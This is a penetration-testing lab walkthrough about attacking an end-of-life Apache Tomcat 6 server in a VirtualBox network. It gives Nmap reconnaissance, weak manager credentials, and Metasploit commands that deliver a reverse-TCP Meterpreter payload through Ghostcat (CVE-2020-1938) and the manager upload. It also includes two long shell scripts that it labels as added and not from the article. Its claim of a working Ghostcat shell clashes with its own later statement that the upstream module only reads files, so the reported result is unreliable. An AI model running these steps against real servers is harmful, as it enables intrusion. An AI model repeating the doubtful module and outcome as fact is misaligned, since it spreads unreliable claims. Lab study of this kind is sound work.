Exploiting Apache Tomcat6 using Metasploit
The article describes an internal network lab built with VirtualBox to test the security of Apache Tomcat 6. Using two virtual machines (Kali as the attacker and Ubuntu as the victim), it shows how the Ghostcat vulnerability (CVE-2020-1938) in Tomcat 6 can be exploited for remote code execution and stresses the security risk that outdated software carries. 2025-07-26 07:09:08 Author: infosecwriteups.com

Vishvadini Ravihari


Apache Tomcat 6 is a widely used open source Java Servlet container and web server for deploying Java-based web applications. Despite its popularity, Tomcat 6 reached end of life at the end of 2016 and no longer receives security updates. This virtual lab environment was prepared with Oracle VirtualBox to simulate an internal network scenario for a penetration test of Apache Tomcat 6.

Two virtual machines were attached to the same VirtualBox NAT Network so that they could only be reached from each other: an Ubuntu Server VM served as the vulnerable target (Victim), running a legacy version of Apache Tomcat (v6.0.41) with known critical vulnerabilities, and a Kali Linux VM acted as the attacker machine.

Both VMs were assigned static IPs within the range 192.168.50.0/24:
* Kali (Attacker) IP: 192.168.50.10
* Ubuntu Server (Victim) IP: 192.168.50.20

This configuration was done as follows:
On the Kali VM, the static IP was added through Advanced Network Configuration with the IPv4 method set to Manual. On the Ubuntu VM, the netplan manifest 00-netcfg.yaml was set to give the enp0s8 adapter the IP above with DHCP disabled.


Advanced Network Configuration Interface
ifconfig on the attacker


Configuring netplan in the Victim


ip a on the Victim

Once assigned, ping commands were issued from the Kali machine (the Attacker) to the Ubuntu server running Tomcat 6 (the Victim) to test network reachability.
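The victim-side netplan step above, as an added example that is not part of the original article: a script that renders the enp0s8 configuration the lab describes, writes it to 00-netcfg.yaml, applies it, and checks that the attacker answers a ping. Interface name and addresses are the lab's; the directory /etc/netplan is netplan's default, and no default route is configured because only the two lab hosts need to talk.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): render and apply the static
# netplan configuration for the victim's enp0s8 interface and confirm that the
# attacker can be reached. Interface name, addresses and the file name
# 00-netcfg.yaml are the lab's; the directory /etc/netplan is netplan's default.
set -eu

# Render a netplan document that gives one interface a static address with
# DHCP disabled. No default route is set: the lab only needs the two hosts to
# reach each other inside the VirtualBox NAT network.
render_netplan() {
  local iface="$1" cidr="$2"
  cat <<EOF
network:
  version: 2
  renderer: networkd
  ethernets:
    ${iface}:
      dhcp4: false
      addresses:
        - ${cidr}
EOF
}

# Write the document to the netplan directory (root required) and apply it.
# The file is made owner-only readable; recent netplan versions warn when a
# configuration file is world-readable.
apply_netplan() {
  local iface="$1" cidr="$2" target="${3:-/etc/netplan/00-netcfg.yaml}"
  render_netplan "$iface" "$cidr" > "$target"
  chmod 0600 "$target"
  netplan apply
}

# Return 0 when the peer answers a single ICMP echo within two seconds.
reachable() {
  ping -c 1 -W 2 "$1" > /dev/null 2>&1
}

# Usage on the Ubuntu victim:  sudo ./netcfg.sh apply
if [ "${1:-}" = "apply" ]; then
  apply_netplan enp0s8 192.168.50.20/24
  if reachable 192.168.50.10; then
    echo "attacker 192.168.50.10 reachable"
  else
    echo "attacker 192.168.50.10 not reachable" >&2
    exit 1
  fi
fi
```

Run it with `apply` on the victim after the NAT Network has been created in VirtualBox; without an argument it only defines the functions, so it can be sourced to inspect the rendered YAML first.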

The target VM was first updated and given the Java runtime that Tomcat 6 needs, OpenJDK 8. This was done with:

sudo apt update
sudo apt install openjdk-8-jdk -y

To check which Java version is active (OpenJDK 8 only understands the single-dash form):

java -version

If the output shows something other than OpenJDK 8:

sudo update-alternatives --config java

Select OpenJDK 8 as the default and apply.
Once Java was in place, the Tomcat 6 binary distribution was downloaded and extracted in the /opt directory:

cd /opt
sudo wget https://archive.apache.org/dist/tomcat/tomcat-6/v6.0.41/bin/apache-tomcat-6.0.41.tar.gz
sudo tar -xzf apache-tomcat-6.0.41.tar.gz
sudo mv apache-tomcat-6.0.41 tomcat6
sudo chmod +x /opt/tomcat6/bin/*.sh

To configure a user for the manager application, edit /opt/tomcat6/conf/tomcat-users.xml (the file ships with every user commented out) and add the following entries, which create a user with the manager-script role. In Tomcat 6.0.30 and later, manager-script grants only the text interface (/manager/list, /manager/deploy and so on); the HTML interface at /manager/html needs the manager-gui role. The credentials tomcat/tomcat are deliberately weak for this lab:

<tomcat-users>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-script"/>
</tomcat-users>

Tomcat was then started using its startup script:

cd /opt/tomcat6/bin
sudo ./startup.sh

To verify successful deployment, Tomcat's listening ports and active processes were checked with the following commands (the stock server.xml of Tomcat 6 also enables the AJP connector on port 8009, which becomes relevant later):

sudo netstat -tulnp | grep 8080
ps aux | grep tomcat


Verifying that Tomcat 6 is running

Once Tomcat is up, a curl request to http://localhost:8080 fetches the default welcome page (or simply browse to http://localhost:8080 if the server environment provides a GUI).


Tomcat6 web interface

From the attacking Kali VM, the target machine’s IP address (192.168.50.20) was verified for basic reachability using:

ping 192.168.50.20

Port 25 was also probed with Netcat to check for an SMTP service:

nc -vn 192.168.50.20 25

The Tomcat web interface can also be accessed to confirm the HTTP service on port 8080: http://192.168.50.20:8080

Service and port discovery against the target was done with Nmap:

For service and version detection:

nmap -sV 192.168.50.20


or for a plain port scan that skips host discovery:

nmap -Pn 192.168.50.20


The Metasploit Framework is a widely used open source platform that provides a collection of modules to identify, exploit, and validate vulnerabilities in remote systems. It can be accessed using the msfconsole command in Kali Linux and it enables interactive execution of exploits, configuration of payloads, and management of sessions in real time.

A vulnerability assessment from the Kali VM identified the Victim as exposed to the following critical/high findings:
1. Apache Tomcat AJP Ghostcat (CVE-2020-1938)
2. Apache Tomcat Default Files and Interfaces

Vulnerability 1: Apache Tomcat AJP Ghostcat (CVE-2020-1938)
The first vulnerability targeted was Ghostcat, a critical flaw in the Apache JServ Protocol (AJP) connector. The connector trusts request attributes that are normally set by a front-end proxy, so a client that can reach the AJP port (8009 by default) directly can send crafted messages that make Tomcat read any file inside a web application (for example WEB-INF/web.xml) or evaluate an existing file as a JSP, without any authentication. Where there is also a way to place a file inside the web application (an upload function, for instance), this becomes remote code execution. Tomcat 6 was already end of life when the flaw was published and never received the fix.

Using nmap, it was discovered that port 8009 was open on the target:

nmap -sV -p 8009 192.168.50.20


Metasploit’s Ghostcat exploit module was then used from the Kali (the Attacker):

To open the metasploit framework;

msfconsole

To configure and start the attack;

use exploit/multi/http/tomcat_ajp_upload_bypass
set RHOSTS 192.168.50.20
set RPORT 8009
set LHOST 192.168.50.10
set LPORT 4444
set payload java/meterpreter/reverse_tcp
exploit

This resulted in a successful Meterpreter session, showing that the vulnerability could be exploited for remote code execution through the exposed AJP service. Note that the Ghostcat module in the upstream Metasploit tree, auxiliary/admin/http/tomcat_ghostcat, only reads a file such as WEB-INF/web.xml over AJP and delivers no payload by itself; turning the file read into code execution needs a way to get a file into the web application first.


Successful exploitation of Ghostcat

Vulnerability 2: Apache Tomcat Default Files and Interfaces
Default installations of Apache Tomcat often include unsecured example files and administrative web interfaces. If not properly locked down, these can be leveraged for unauthorized access or file upload vulnerabilities.

Using nmap, it was reconfirmed that port 8080 was open on the target:

nmap -sV -p 8080 192.168.50.20


Attempts were made to access the manager interface by browsing to http://192.168.50.20:8080/manager/html, but access was denied. This is expected for the account configured earlier: the HTML interface requires the manager-gui role, and the lab user only holds manager-script.


Metasploit was then used against this interface with an exploit module and a payload:

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS 192.168.50.20
set RPORT 8080
set HttpUsername tomcat
set HttpPassword tomcat
set TARGETURI /manager/html
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.50.10
set LPORT 4444
exploit

The exploit attempt failed with the error "Unable to access the Tomcat Manager", meaning the module could not reach the upload endpoint. Two details of this setup explain it: the account holds manager-script but not manager-gui, so the HTML upload form the module drives is forbidden, and TARGETURI should name the manager root (the module's default is /manager) because the module appends the /html/upload path itself. The route that manager-script does permit on Tomcat 6 is a WAR deployment through the text interface (PUT to /manager/deploy), which is what the separate module exploit/multi/http/tomcat_mgr_deploy uses.


Exploitation to access upload endpoint was aborted

The main objective of this internal lab exercise was to demonstrate how legacy services such as Apache Tomcat 6 pose significant security risks when exposed with default configurations, even when the attacker makes no authentication attempt at all, whether by credential brute force or password guessing. Of the two findings tested, Ghostcat proved the most impactful, giving full remote access through the AJP connector, while the default Tomcat files and interfaces offered limited insight and did not lead to successful exploitation.

It is therefore crucial not to rely on legacy systems and to upgrade to supported, patched versions instead. Where a business requirement forces the use of such a system, for example an application that only runs on Apache Tomcat 6, the environment must be properly hardened: disable the AJP connector or bind it to the loopback address, remove or lock down the manager and example applications, and never leave guessable credentials in tomcat-users.xml.
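The two exposures this lab exploited, an AJP connector listening on every interface and a manager account with a guessable password, can both be audited from a shell on the Tomcat host, and the AJP one can be fixed in place. The script below is an added example, not code from the article or from the Tomcat project; it assumes the lab's /opt/tomcat6 layout and uses a short default-password list of its own.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): audit a Tomcat 6 tree for an
# AJP connector reachable from the network (Ghostcat, CVE-2020-1938) and for
# manager accounts with guessable passwords, and write a hardened server.xml.
# The default path is the lab's /opt/tomcat6; the password list is this
# script's own, not Tomcat's.
set -eu

# Classify the AJP connector in server.xml: "exposed" (bound to all
# interfaces), "loopback" (address= pinned to localhost) or "absent" (none, or
# commented out). Lines are joined so multi-line <Connector ...> elements and
# multi-line comments are handled; the ERE strips well-formed XML comments,
# which never contain "--".
ajp_exposure() {
  local live ajp
  live=$(tr '\n' ' ' < "$1" | sed -E 's/<!--([^-]|-[^-])*-->//g')
  ajp=$(printf '%s' "$live" | grep -oE '<Connector[^>]*AJP/1\.3[^>]*>' || true)
  if [ -z "$ajp" ]; then
    echo absent
  elif printf '%s' "$ajp" | grep -qE 'address="(127\.0\.0\.1|::1|localhost)"'; then
    echo loopback
  else
    echo exposed
  fi
}

# Copy server.xml from $1 to $2 with every live AJP connector wrapped in a
# comment. Tomcat 6 is end of life and never received the Ghostcat fix, so
# removing the connector (or binding it to 127.0.0.1 for a local reverse
# proxy) is the only mitigation available.
disable_ajp() {
  awk '
    /<Connector/ && $0 !~ /<!--/ {
      buf = $0
      while (buf !~ />/ && (getline line) > 0) buf = buf "\n" line
      if (buf ~ /AJP\/1\.3/) {
        print "<!-- AJP connector disabled: Ghostcat (CVE-2020-1938) is unpatched in Tomcat 6"
        print buf
        print "-->"
      } else {
        print buf
      }
      next
    }
    { print }
  ' "$1" > "$2"
}

# Print users in tomcat-users.xml that hold any manager-* role and whose
# password is empty, equal to the username, or on a short default list.
weak_manager_users() {
  local line u p r
  grep -E '<user ' "$1" | while IFS= read -r line; do
    u=$(printf '%s' "$line" | sed -E 's/.*username="([^"]*)".*/\1/')
    p=$(printf '%s' "$line" | sed -E 's/.*password="([^"]*)".*/\1/')
    r=$(printf '%s' "$line" | sed -E 's/.*roles="([^"]*)".*/\1/')
    case "$r" in *manager*) ;; *) continue ;; esac
    case "$p" in ""|"$u"|tomcat|s3cret|admin|password|changeit) echo "$u" ;; esac
  done
}

# Usage: ./tomcat6-audit.sh CATALINA_HOME   e.g. ./tomcat6-audit.sh /opt/tomcat6
if [ -n "${1:-}" ]; then
  conf="$1/conf"
  echo "AJP connector: $(ajp_exposure "$conf/server.xml")"
  weak=$(weak_manager_users "$conf/tomcat-users.xml")
  [ -z "$weak" ] || echo "manager users with weak passwords: $weak"
  disable_ajp "$conf/server.xml" "$conf/server.xml.hardened"
  echo "hardened copy written to $conf/server.xml.hardened"
fi
```

The hardened file is written beside the original rather than over it; review the diff, move it into place and restart Tomcat with shutdown.sh and startup.sh, then confirm with `netstat -tulnp` that nothing listens on 8009 any more. Weak manager passwords are only reported, since the replacement password is a decision for the operator, not the script.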


Source: https://infosecwriteups.com/exploiting-apache-tomcat6-using-metasploit-d5ba3c4950e7?source=rss----7b722bfd1b8d---4